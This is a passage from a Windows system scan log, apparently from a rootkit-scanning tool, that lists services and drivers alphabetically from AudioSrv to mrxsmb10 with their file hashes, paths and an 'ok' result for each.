17:30:23.0178 7020  [ 07721A77180EDD4D39CCB865BF63C7FD ] AudioSrv        C:\Windows\System32\Audiosrv.dll
17:30:23.0225 7020  AudioSrv - ok
17:30:23.0266 7020  [ 7806BFCD1D7FA5EC23F7324D4EAFD25B ] avgntflt        C:\Windows\system32\DRIVERS\avgntflt.sys
17:30:23.0471 7020  avgntflt - ok
17:30:23.0591 7020  [ C3A58DBD18786C338126D30BF8C33D72 ] avipbb          C:\Windows\system32\DRIVERS\avipbb.sys
17:30:23.0795 7020  avipbb - ok
17:30:23.0886 7020  [ 390184FAD8FCC1B6DA25AEBAE928C3B6 ] avkmgr          C:\Windows\system32\DRIVERS\avkmgr.sys
17:30:24.0077 7020  avkmgr - ok
17:30:24.0116 7020  [ B20B5FA5CA050E9926E4D1DB81501B32 ] AxInstSV        C:\Windows\System32\AxInstSV.dll
17:30:24.0205 7020  AxInstSV - ok
17:30:24.0250 7020  [ 3E5B191307609F7514148C6832BB0842 ] b06bdrv        C:\Windows\system32\DRIVERS\bxvbda.sys
17:30:24.0305 7020  b06bdrv - ok
17:30:24.0338 7020  [ B5ACE6968304A3900EEB1EBFD9622DF2 ] b57nd60a        C:\Windows\system32\DRIVERS\b57nd60a.sys
17:30:24.0372 7020  b57nd60a - ok
17:30:24.0412 7020  [ 9E84A931DBEE0292E38ED672F6293A99 ] BCM43XX        C:\Windows\system32\DRIVERS\bcmwl664.sys
17:30:24.0531 7020  BCM43XX - ok
17:30:24.0554 7020  [ FDE360167101B4E45A96F939F388AEB0 ] BDESVC          C:\Windows\System32\bdesvc.dll
17:30:24.0593 7020  BDESVC - ok
17:30:24.0630 7020  [ 16A47CE2DECC9B099349A5F840654746 ] Beep            C:\Windows\system32\drivers\Beep.sys
17:30:24.0696 7020  Beep - ok
17:30:24.0743 7020  [ 4992C609A6315671463E30F6512BC022 ] BFE            C:\Windows\System32\bfe.dll
17:30:24.0847 7020  BFE - ok
17:30:24.0887 7020  [ 7F0C323FE3DA28AA4AA1BDA3F575707F ] BITS            C:\Windows\system32\qmgr.dll
17:30:24.0957 7020  BITS - ok
17:30:24.0986 7020  [ 61583EE3C3A17003C4ACD0475646B4D3 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
17:30:25.0034 7020  blbdrive - ok
17:30:25.0119 7020  [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
17:30:25.0143 7020  Bonjour Service - ok
17:30:25.0183 7020  [ 19D20159708E152267E53B66677A4995 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
17:30:25.0238 7020  bowser - ok
17:30:25.0284 7020  [ F09EEE9EDC320B5E1501F749FDE686C8 ] BrFiltLo        C:\Windows\system32\DRIVERS\BrFiltLo.sys
17:30:25.0324 7020  BrFiltLo - ok
17:30:25.0328 7020  [ B114D3098E9BDB8BEA8B053685831BE6 ] BrFiltUp        C:\Windows\system32\DRIVERS\BrFiltUp.sys
17:30:25.0353 7020  BrFiltUp - ok
17:30:25.0394 7020  [ 5C2F352A4E961D72518261257AAE204B ] BridgeMP        C:\Windows\system32\DRIVERS\bridge.sys
17:30:25.0451 7020  BridgeMP - ok
17:30:25.0475 7020  [ 6B054C67AAA87843504E8E3C09102009 ] Browser        C:\Windows\System32\browser.dll
17:30:25.0490 7020  Browser - ok
17:30:25.0518 7020  [ 43BEA8D483BF1870F018E2D02E06A5BD ] Brserid        C:\Windows\System32\Drivers\Brserid.sys
17:30:25.0545 7020  Brserid - ok
17:30:25.0560 7020  [ A6ECA2151B08A09CACECA35C07F05B42 ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
17:30:25.0609 7020  BrSerWdm - ok
17:30:25.0651 7020  [ B79968002C277E869CF38BD22CD61524 ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
17:30:25.0708 7020  BrUsbMdm - ok
17:30:25.0713 7020  [ A87528880231C54E75EA7A44943B38BF ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
17:30:25.0741 7020  BrUsbSer - ok
17:30:25.0786 7020  [ 89F5586E80B42CA4E98B3EFDAFCAD1B8 ] BTATH_A2DP      C:\Windows\system32\drivers\btath_a2dp.sys
17:30:25.0823 7020  BTATH_A2DP - ok
17:30:25.0854 7020  [ BC14A513C0120919A019E18061FACA46 ] BTATH_BUS      C:\Windows\system32\DRIVERS\btath_bus.sys
17:30:26.0013 7020  BTATH_BUS - ok
17:30:26.0025 7020  [ 76E867C34242D16E3418AA9A9430D96A ] BTATH_HCRP      C:\Windows\system32\DRIVERS\btath_hcrp.sys
17:30:26.0209 7020  BTATH_HCRP - ok
17:30:26.0225 7020  [ 6409827297DAF3699643E9F6EC5C2CD2 ] BTATH_LWFLT    C:\Windows\system32\DRIVERS\btath_lwflt.sys
17:30:26.0244 7020  BTATH_LWFLT - ok
17:30:26.0251 7020  [ 2B53167C52A1730A59EDFD3C83DEFF70 ] BTATH_RCP      C:\Windows\system32\DRIVERS\btath_rcp.sys
17:30:26.0273 7020  BTATH_RCP - ok
17:30:26.0305 7020  [ 9B014E62BD3541812A0B2A46459B31D7 ] BtFilter        C:\Windows\system32\DRIVERS\btfilter.sys
17:30:26.0324 7020  BtFilter - ok
17:30:26.0367 7020  [ CF98190A94F62E405C8CB255018B2315 ] BthEnum        C:\Windows\system32\drivers\BthEnum.sys
17:30:26.0417 7020  BthEnum - ok
17:30:26.0448 7020  [ 9DA669F11D1F894AB4EB69BF546A42E8 ] BTHMODEM        C:\Windows\system32\DRIVERS\bthmodem.sys
17:30:26.0494 7020  BTHMODEM - ok
17:30:26.0539 7020  [ 02DD601B708DD0667E1331FA8518E9FF ] BthPan          C:\Windows\system32\DRIVERS\bthpan.sys
17:30:26.0569 7020  BthPan - ok
17:30:26.0603 7020  [ D59773C7FDD3D795D6FE402EEEA8D71E ] BTHPORT        C:\Windows\System32\Drivers\BTHport.sys
17:30:26.0660 7020  BTHPORT - ok
17:30:26.0707 7020  [ 95F9C2976059462CBBF227F7AAB10DE9 ] bthserv        C:\Windows\system32\bthserv.dll
17:30:26.0800 7020  bthserv - ok
17:30:26.0820 7020  [ 8504842634DD144C075B6B0C982CCEC4 ] BTHUSB          C:\Windows\System32\Drivers\BTHUSB.sys
17:30:26.0840 7020  BTHUSB - ok
17:30:26.0859 7020  catchme - ok
17:30:26.0884 7020  [ B8BD2BB284668C84865658C77574381A ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
17:30:26.0958 7020  cdfs - ok
17:30:26.0998 7020  [ 83D2D75E1EFB81B3450C18131443F7DB ] cdrom          C:\Windows\system32\DRIVERS\cdrom.sys
17:30:27.0057 7020  cdrom - ok
17:30:27.0094 7020  [ 312E2F82AF11E79906898AC3E3D58A1F ] CertPropSvc    C:\Windows\System32\certprop.dll
17:30:27.0185 7020  CertPropSvc - ok
17:30:27.0225 7020  [ D7CD5C4E1B71FA62050515314CFB52CF ] circlass        C:\Windows\system32\DRIVERS\circlass.sys
17:30:27.0262 7020  circlass - ok
17:30:27.0297 7020  [ FE1EC06F2253F691FE36217C592A0206 ] CLFS            C:\Windows\system32\CLFS.sys
17:30:27.0355 7020  CLFS - ok
17:30:27.0424 7020  [ D88040F816FDA31C3B466F0FA0918F29 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
17:30:27.0462 7020  clr_optimization_v2.0.50727_32 - ok
17:30:27.0479 7020  [ D1CEEA2B47CB998321C579651CE3E4F8 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
17:30:27.0516 7020  clr_optimization_v2.0.50727_64 - ok
17:30:27.0598 7020  [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
17:30:27.0627 7020  clr_optimization_v4.0.30319_32 - ok
17:30:27.0642 7020  [ C6F9AF94DCD58122A4D7E89DB6BED29D ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
17:30:27.0672 7020  clr_optimization_v4.0.30319_64 - ok
17:30:27.0691 7020  [ 0840155D0BDDF1190F84A663C284BD33 ] CmBatt          C:\Windows\system32\DRIVERS\CmBatt.sys
17:30:27.0727 7020  CmBatt - ok
17:30:27.0751 7020  [ E19D3F095812725D88F9001985B94EDD ] cmdide          C:\Windows\system32\DRIVERS\cmdide.sys
17:30:27.0772 7020  cmdide - ok
17:30:27.0813 7020  [ CA7720B73446FDDEC5C69519C1174C98 ] CNG            C:\Windows\system32\Drivers\cng.sys
17:30:27.0898 7020  CNG - ok
17:30:27.0938 7020  [ 102DE219C3F61415F964C88E9085AD14 ] Compbatt        C:\Windows\system32\DRIVERS\compbatt.sys
17:30:27.0970 7020  Compbatt - ok
17:30:27.0984 7020  [ F26B3A86F6FA87CA360B879581AB4123 ] CompositeBus    C:\Windows\system32\DRIVERS\CompositeBus.sys
17:30:28.0019 7020  CompositeBus - ok
17:30:28.0030 7020  COMSysApp - ok
17:30:28.0042 7020  [ 1C827878A998C18847245FE1F34EE597 ] crcdisk        C:\Windows\system32\DRIVERS\crcdisk.sys
17:30:28.0059 7020  crcdisk - ok
17:30:28.0105 7020  [ BAF19B633933A9FB4883D27D66C39E9A ] CryptSvc        C:\Windows\system32\cryptsvc.dll
17:30:28.0146 7020  CryptSvc - ok
17:30:28.0196 7020  [ 7266972E86890E2B30C0C322E906B027 ] DcomLaunch      C:\Windows\system32\rpcss.dll
17:30:28.0298 7020  DcomLaunch - ok
17:30:28.0325 7020  [ 3CEC7631A84943677AA8FA8EE5B6B43D ] defragsvc      C:\Windows\System32\defragsvc.dll
17:30:28.0442 7020  defragsvc - ok
17:30:28.0484 7020  [ 9C253CE7311CA60FC11C774692A13208 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
17:30:28.0528 7020  DfsC - ok
17:30:28.0578 7020  [ CE3B9562D997F69B330D181A8875960F ] Dhcp            C:\Windows\system32\dhcpcore.dll
17:30:28.0635 7020  Dhcp - ok
17:30:28.0688 7020  [ 13096B05847EC78F0977F2C0F79E9AB3 ] discache        C:\Windows\system32\drivers\discache.sys
17:30:28.0807 7020  discache - ok
17:30:28.0856 7020  [ 9819EEE8B5EA3784EC4AF3B137A5244C ] Disk            C:\Windows\system32\DRIVERS\disk.sys
17:30:28.0894 7020  Disk - ok
17:30:28.0918 7020  [ 85CF424C74A1D5EC33533E1DBFF9920A ] Dnscache        C:\Windows\System32\dnsrslvr.dll
17:30:28.0958 7020  Dnscache - ok
17:30:28.0994 7020  [ 14452ACDB09B70964C8C21BF80A13ACB ] dot3svc        C:\Windows\System32\dot3svc.dll
17:30:29.0087 7020  dot3svc - ok
17:30:29.0103 7020  [ 8C2BA6BEA949EE6E68385F5692BAFB94 ] DPS            C:\Windows\system32\dps.dll
17:30:29.0173 7020  DPS - ok
17:30:29.0207 7020  [ 9B19F34400D24DF84C858A421C205754 ] drmkaud        C:\Windows\system32\drivers\drmkaud.sys
17:30:29.0241 7020  drmkaud - ok
17:30:29.0302 7020  [ 2643274535FC1770DAA9B73346A027B8 ] DsiWMIService  C:\Program Files (x86)\Launch Manager\dsiwmis.exe
17:30:29.0522 7020  DsiWMIService - ok
17:30:29.0625 7020  [ 1633B9ABF52784A1331476397A48CBEF ] DXGKrnl        C:\Windows\System32\drivers\dxgkrnl.sys
17:30:29.0663 7020  DXGKrnl - ok
17:30:29.0718 7020  [ E2DDA8726DA9CB5B2C4000C9018A9633 ] EapHost        C:\Windows\System32\eapsvc.dll
17:30:29.0788 7020  EapHost - ok
17:30:29.0906 7020  [ DC5D737F51BE844D8C82C695EB17372F ] ebdrv          C:\Windows\system32\DRIVERS\evbda.sys
17:30:30.0078 7020  ebdrv - ok
17:30:30.0109 7020  [ 156F6159457D0AA7E59B62681B56EB90 ] EFS            C:\Windows\System32\lsass.exe
17:30:30.0152 7020  EFS - ok
17:30:30.0224 7020  [ 47C071994C3F649F23D9CD075AC9304A ] ehRecvr        C:\Windows\ehome\ehRecvr.exe
17:30:30.0293 7020  ehRecvr - ok
17:30:30.0323 7020  [ 4705E8EF9934482C5BB488CE28AFC681 ] ehSched        C:\Windows\ehome\ehsched.exe
17:30:30.0363 7020  ehSched - ok
17:30:30.0416 7020  [ 0E5DA5369A0FCAEA12456DD852545184 ] elxstor        C:\Windows\system32\DRIVERS\elxstor.sys
17:30:30.0492 7020  elxstor - ok
17:30:30.0580 7020  [ DA751BD36852BB7F4515DFC9EE213245 ] ePowerSvc      C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
17:30:30.0802 7020  ePowerSvc - ok
17:30:30.0905 7020  [ 34A3C54752046E79A126E15C51DB409B ] ErrDev          C:\Windows\system32\DRIVERS\errdev.sys
17:30:30.0948 7020  ErrDev - ok
17:30:31.0013 7020  [ 4166F82BE4D24938977DD1746BE9B8A0 ] EventSystem    C:\Windows\system32\es.dll
17:30:31.0104 7020  EventSystem - ok
17:30:31.0154 7020  [ A510C654EC00C1E9BDD91EEB3A59823B ] exfat          C:\Windows\system32\drivers\exfat.sys
17:30:31.0216 7020  exfat - ok
17:30:31.0223 7020  [ 0ADC83218B66A6DB380C330836F3E36D ] fastfat        C:\Windows\system32\drivers\fastfat.sys
17:30:31.0278 7020  fastfat - ok
17:30:31.0324 7020  [ D607B2F1BEE3992AA6C2C92C0A2F0855 ] Fax            C:\Windows\system32\fxssvc.exe
17:30:31.0359 7020  Fax - ok
17:30:31.0404 7020  [ D765D19CD8EF61F650C384F62FAC00AB ] fdc            C:\Windows\system32\DRIVERS\fdc.sys
17:30:31.0436 7020  fdc - ok
17:30:31.0460 7020  [ 0438CAB2E03F4FB61455A7956026FE86 ] fdPHost        C:\Windows\system32\fdPHost.dll
17:30:31.0511 7020  fdPHost - ok
17:30:31.0531 7020  [ 802496CB59A30349F9A6DD22D6947644 ] FDResPub        C:\Windows\system32\fdrespub.dll
17:30:31.0581 7020  FDResPub - ok
17:30:31.0596 7020  [ 655661BE46B5F5F3FD454E2C3095B930 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
17:30:31.0615 7020  FileInfo - ok
17:30:31.0624 7020  [ 5F671AB5BC87EEA04EC38A6CD5962A47 ] Filetrace      C:\Windows\system32\drivers\filetrace.sys
17:30:31.0687 7020  Filetrace - ok
17:30:31.0714 7020  [ C172A0F53008EAEB8EA33FE10E177AF5 ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
17:30:31.0735 7020  flpydisk - ok
17:30:31.0753 7020  [ F7866AF72ABBAF84B1FA5AA195378C59 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
17:30:31.0788 7020  FltMgr - ok
17:30:31.0860 7020  [ CB5E4B9C319E3C6BB363EB7E58A4A051 ] FontCache      C:\Windows\system32\FntCache.dll
17:30:31.0940 7020  FontCache - ok
17:30:31.0988 7020  [ 8D89E3131C27FDD6932189CB785E1B7A ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
17:30:32.0016 7020  FontCache3.0.0.0 - ok
17:30:32.0041 7020  [ D43703496149971890703B4B1B723EAC ] FsDepends      C:\Windows\system32\drivers\FsDepends.sys
17:30:32.0061 7020  FsDepends - ok
17:30:32.0095 7020  [ D3E3F93D67821A2DB2B3D9FAC2DC2064 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
17:30:32.0111 7020  Fs_Rec - ok
17:30:32.0160 7020  [ 1F44F8559E61A8306ECC67BB1E168B7C ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
17:30:32.0214 7020  fvevol - ok
17:30:32.0251 7020  [ 8C778D335C9D272CFD3298AB02ABE3B6 ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
17:30:32.0270 7020  gagp30kx - ok
17:30:32.0303 7020  [ 8E98D21EE06192492A5671A6144D092F ] GEARAspiWDM    C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
17:30:32.0333 7020  GEARAspiWDM - ok
17:30:32.0368 7020  [ FE5AB4525BC2EC68B9119A6E5D40128B ] gpsvc          C:\Windows\System32\gpsvc.dll
17:30:32.0450 7020  gpsvc - ok
17:30:32.0525 7020  [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdate        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
17:30:32.0537 7020  gupdate - ok
17:30:32.0542 7020  [ 506708142BC63DABA64F2D3AD1DCD5BF ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
17:30:32.0553 7020  gupdatem - ok
17:30:32.0581 7020  [ F2523EF6460FC42405B12248338AB2F0 ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
17:30:32.0614 7020  hcw85cir - ok
17:30:32.0636 7020  [ 6410F6F415B2A5A9037224C41DA8BF12 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
17:30:32.0682 7020  HdAudAddService - ok
17:30:32.0704 7020  [ 0A49913402747A0B67DE940FB42CBDBB ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
17:30:32.0755 7020  HDAudBus - ok
17:30:32.0801 7020  [ B6AC71AAA2B10848F57FC49D55A651AF ] HECIx64        C:\Windows\system32\DRIVERS\HECIx64.sys
17:30:32.0985 7020  HECIx64 - ok
17:30:33.0004 7020  [ 78E86380454A7B10A5EB255DC44A355F ] HidBatt        C:\Windows\system32\DRIVERS\HidBatt.sys
17:30:33.0041 7020  HidBatt - ok
17:30:33.0051 7020  [ 7FD2A313F7AFE5C4DAB14798C48DD104 ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
17:30:33.0087 7020  HidBth - ok
17:30:33.0092 7020  [ 0A77D29F311B88CFAE3B13F9C1A73825 ] HidIr          C:\Windows\system32\DRIVERS\hidir.sys
17:30:33.0129 7020  HidIr - ok
17:30:33.0154 7020  [ BD9EB3958F213F96B97B1D897DEE006D ] hidserv        C:\Windows\System32\hidserv.dll
17:30:33.0234 7020  hidserv - ok
17:30:33.0278 7020  [ B3BF6B5B50006DEF50B66306D99FCF6F ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
17:30:33.0315 7020  HidUsb - ok
17:30:33.0338 7020  [ EFA58EDE58DD74388FFD04CB32681518 ] hkmsvc          C:\Windows\system32\kmsvc.dll
17:30:33.0418 7020  hkmsvc - ok
17:30:33.0434 7020  [ 046B2673767CA626E2CFB7FDF735E9E8 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
17:30:33.0484 7020  HomeGroupListener - ok
17:30:33.0522 7020  [ 06A7422224D9865A5613710A089987DF ] HomeGroupProvider C:\Windows\system32\provsvc.dll
17:30:33.0546 7020  HomeGroupProvider - ok
17:30:33.0591 7020  [ 0886D440058F203EBA0E1825E4355914 ] HpSAMD          C:\Windows\system32\DRIVERS\HpSAMD.sys
17:30:33.0629 7020  HpSAMD - ok
17:30:33.0666 7020  [ CEE049CAC4EFA7F4E1E4AD014414A5D4 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
17:30:33.0731 7020  HTTP - ok
17:30:33.0742 7020  [ F17766A19145F111856378DF337A5D79 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
17:30:33.0760 7020  hwpolicy - ok
17:30:33.0783 7020  [ FA55C73D4AFFA7EE23AC4BE53B4592D3 ] i8042prt        C:\Windows\system32\DRIVERS\i8042prt.sys
17:30:33.0808 7020  i8042prt - ok
17:30:33.0836 7020  [ ABBF174CB394F5C437410A788B7E404A ] iaStor          C:\Windows\system32\DRIVERS\iaStor.sys
17:30:34.0029 7020  iaStor - ok
17:30:34.0084 7020  [ B75E45C564E944A2657167D197AB29DA ] iaStorV        C:\Windows\system32\drivers\iaStorV.sys
17:30:34.0137 7020  iaStorV - ok
17:30:34.0201 7020  [ 2F2BE70D3E02B6FA877921AB9516D43C ] idsvc          C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\infocard.exe
17:30:34.0314 7020  idsvc - ok
17:30:34.0589 7020  [ 09CE164AFA8483E41808784D7FCA154E ] igfx            C:\Windows\system32\DRIVERS\igdkmd64.sys
17:30:35.0012 7020  igfx - ok
17:30:35.0055 7020  [ 5C18831C61933628F5BB0EA2675B9D21 ] iirsp          C:\Windows\system32\DRIVERS\iirsp.sys
17:30:35.0074 7020  iirsp - ok
17:30:35.0115 7020  [ C5B4683680DF085B57BC53E5EF34861F ] IKEEXT          C:\Windows\System32\ikeext.dll
17:30:35.0190 7020  IKEEXT - ok
17:30:35.0269 7020  [ 3EDD3CE185DA3E6AAEC22ADCFD7B1D54 ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHD64.sys
17:30:35.0539 7020  IntcAzAudAddService - ok
17:30:35.0621 7020  [ F00F20E70C6EC3AA366910083A0518AA ] intelide        C:\Windows\system32\DRIVERS\intelide.sys
17:30:35.0645 7020  intelide - ok
17:30:35.0898 7020  [ 09CE164AFA8483E41808784D7FCA154E ] intelkmd        C:\Windows\system32\DRIVERS\igdpmd64.sys
17:30:36.0251 7020  intelkmd - ok
17:30:36.0283 7020  [ ADA036632C664CAA754079041CF1F8C1 ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
17:30:36.0323 7020  intelppm - ok
17:30:36.0353 7020  [ 098A91C54546A3B878DAD6A7E90A455B ] IPBusEnum      C:\Windows\system32\ipbusenum.dll
17:30:36.0421 7020  IPBusEnum - ok
17:30:36.0435 7020  [ 722DD294DF62483CECAAE6E094B4D695 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
17:30:36.0484 7020  IpFilterDriver - ok
17:30:36.0526 7020  [ F8E058D17363EC580E4B7232778B6CB5 ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
17:30:36.0590 7020  iphlpsvc - ok
17:30:36.0599 7020  [ E2B4A4494DB7CB9B89B55CA268C337C5 ] IPMIDRV        C:\Windows\system32\DRIVERS\IPMIDrv.sys
17:30:36.0625 7020  IPMIDRV - ok
17:30:36.0644 7020  [ AF9B39A7E7B6CAA203B3862582E9F2D0 ] IPNAT          C:\Windows\system32\drivers\ipnat.sys
17:30:36.0715 7020  IPNAT - ok
17:30:36.0779 7020  [ 842D1EDD0F2A6E0E6631BB96BAAA01DE ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
17:30:36.0798 7020  iPod Service - ok
17:30:36.0830 7020  [ 3ABF5E7213EB28966D55D58B515D5CE9 ] IRENUM          C:\Windows\system32\drivers\irenum.sys
17:30:36.0854 7020  IRENUM - ok
17:30:36.0873 7020  [ 2F7B28DC3E1183E5EB418DF55C204F38 ] isapnp          C:\Windows\system32\DRIVERS\isapnp.sys
17:30:36.0892 7020  isapnp - ok
17:30:36.0913 7020  [ FA4D2557DE56D45B0A346F93564BE6E1 ] iScsiPrt        C:\Windows\system32\DRIVERS\msiscsi.sys
17:30:36.0940 7020  iScsiPrt - ok
17:30:36.0966 7020  [ BC02336F1CBA7DCC7D1213BB588A68A5 ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
17:30:36.0986 7020  kbdclass - ok
17:30:37.0027 7020  [ 6DEF98F8541E1B5DCEB2C822A11F7323 ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
17:30:37.0071 7020  kbdhid - ok
17:30:37.0086 7020  [ 156F6159457D0AA7E59B62681B56EB90 ] KeyIso          C:\Windows\system32\lsass.exe
17:30:37.0100 7020  KeyIso - ok
17:30:37.0136 7020  [ 4F4B5FDE429416877DE7143044582EB5 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
17:30:37.0175 7020  KSecDD - ok
17:30:37.0192 7020  [ 6F40465A44ECDC1731BEFAFEC5BDD03C ] KSecPkg        C:\Windows\system32\Drivers\ksecpkg.sys
17:30:37.0229 7020  KSecPkg - ok
17:30:37.0254 7020  [ 6869281E78CB31A43E969F06B57347C4 ] ksthunk        C:\Windows\system32\drivers\ksthunk.sys
17:30:37.0326 7020  ksthunk - ok
17:30:37.0369 7020  [ 6AB66E16AA859232F64DEB66887A8C9C ] KtmRm          C:\Windows\system32\msdtckrm.dll
17:30:37.0464 7020  KtmRm - ok
17:30:37.0523 7020  [ 39918DB0EFCF045A1CE6FABBF339F975 ] L1C            C:\Windows\system32\DRIVERS\L1C62x64.sys
17:30:37.0681 7020  L1C - ok
17:30:37.0712 7020  [ 2AC603C3188C704CFCE353659AA7AD71 ] L1E            C:\Windows\system32\DRIVERS\L1E62x64.sys
17:30:37.0732 7020  L1E - ok
17:30:37.0771 7020  [ 81F1D04D4D0E433099365127375FD501 ] LanmanServer    C:\Windows\System32\srvsvc.dll
17:30:37.0794 7020  LanmanServer - ok
17:30:37.0821 7020  [ 27026EAC8818E8A6C00A1CAD2F11D29A ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
17:30:37.0888 7020  LanmanWorkstation - ok
17:30:37.0920 7020  [ 1538831CF8AD2979A04C423779465827 ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
17:30:37.0970 7020  lltdio - ok
17:30:38.0002 7020  [ C1185803384AB3FEED115F79F109427F ] lltdsvc        C:\Windows\System32\lltdsvc.dll
17:30:38.0119 7020  lltdsvc - ok
17:30:38.0135 7020  [ F993A32249B66C9D622EA5592A8B76B8 ] lmhosts        C:\Windows\System32\lmhsvc.dll
17:30:38.0192 7020  lmhosts - ok
17:30:38.0268 7020  [ 23DE5B62B0445A6F874BE633C95B483E ] LMS            C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
17:30:38.0474 7020  LMS - ok
17:30:38.0583 7020  [ 1A93E54EB0ECE102495A51266DCDB6A6 ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
17:30:38.0620 7020  LSI_FC - ok
17:30:38.0627 7020  [ 1047184A9FDC8BDBFF857175875EE810 ] LSI_SAS        C:\Windows\system32\DRIVERS\lsi_sas.sys
17:30:38.0659 7020  LSI_SAS - ok
17:30:38.0667 7020  [ 30F5C0DE1EE8B5BC9306C1F0E4A75F93 ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
17:30:38.0683 7020  LSI_SAS2 - ok
17:30:38.0689 7020  [ 0504EACAFF0D3C8AED161C4B0D369D4A ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
17:30:38.0710 7020  LSI_SCSI - ok
17:30:38.0732 7020  [ 43D0F98E1D56CCDDB0D5254CFF7B356E ] luafv          C:\Windows\system32\drivers\luafv.sys
17:30:38.0789 7020  luafv - ok
17:30:38.0820 7020  [ F84C8F1000BC11E3B7B23CBD3BAFF111 ] Mcx2Svc        C:\Windows\system32\Mcx2Svc.dll
17:30:38.0857 7020  Mcx2Svc - ok
17:30:38.0871 7020  [ A55805F747C6EDB6A9080D7C633BD0F4 ] megasas        C:\Windows\system32\DRIVERS\megasas.sys
17:30:38.0891 7020  megasas - ok
17:30:38.0898 7020  [ BAF74CE0072480C3B6B7C13B2A94D6B3 ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
17:30:38.0928 7020  MegaSR - ok
17:30:39.0001 7020  Microsoft SharePoint Workspace Audit Service - ok
17:30:39.0045 7020  [ E40E80D0304A73E8D269F7141D77250B ] MMCSS          C:\Windows\system32\mmcss.dll
17:30:39.0132 7020  MMCSS - ok
17:30:39.0167 7020  [ 800BA92F7010378B09F9ED9270F07137 ] Modem          C:\Windows\system32\drivers\modem.sys
17:30:39.0270 7020  Modem - ok
17:30:39.0295 7020  [ B03D591DC7DA45ECE20B3B467E6AADAA ] monitor        C:\Windows\system32\DRIVERS\monitor.sys
17:30:39.0329 7020  monitor - ok
17:30:39.0356 7020  [ 7D27EA49F3C1F687D357E77A470AEA99 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
17:30:39.0381 7020  mouclass - ok
17:30:39.0418 7020  [ D3BF052C40B0C4166D9FD86A4288C1E6 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
17:30:39.0448 7020  mouhid - ok
17:30:39.0491 7020  [ 791AF66C4D0E7C90A3646066386FB571 ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
17:30:39.0525 7020  mountmgr - ok
17:30:39.0568 7020  [ C956DFD0C0BC91625EC4193579488054 ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
17:30:39.0583 7020  MozillaMaintenance - ok
17:30:39.0599 7020  [ 609D1D87649ECC19796F4D76D4C15CEA ] mpio            C:\Windows\system32\DRIVERS\mpio.sys
17:30:39.0624 7020  mpio - ok
17:30:39.0650 7020  [ 6C38C9E45AE0EA2FA5E551F2ED5E978F ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
17:30:39.0723 7020  mpsdrv - ok
17:30:39.0785 7020  [ AECAB449567D1846DAD63ECE49E893E3 ] MpsSvc          C:\Windows\system32\mpssvc.dll
17:30:39.0908 7020  MpsSvc - ok
17:30:39.0924 7020  [ 30524261BB51D96D6FCBAC20C810183C ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
17:30:39.0982 7020  MRxDAV - ok
17:30:40.0014 7020  [ 040D62A9D8AD28922632137ACDD984F2 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
17:30:40.0045 7020  mrxsmb - ok
17:30:40.0070 7020  [ F0067552F8F9B33D7C59403AB808A3CB ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
17:30:40.0121 7020  mrxsmb10 - ok
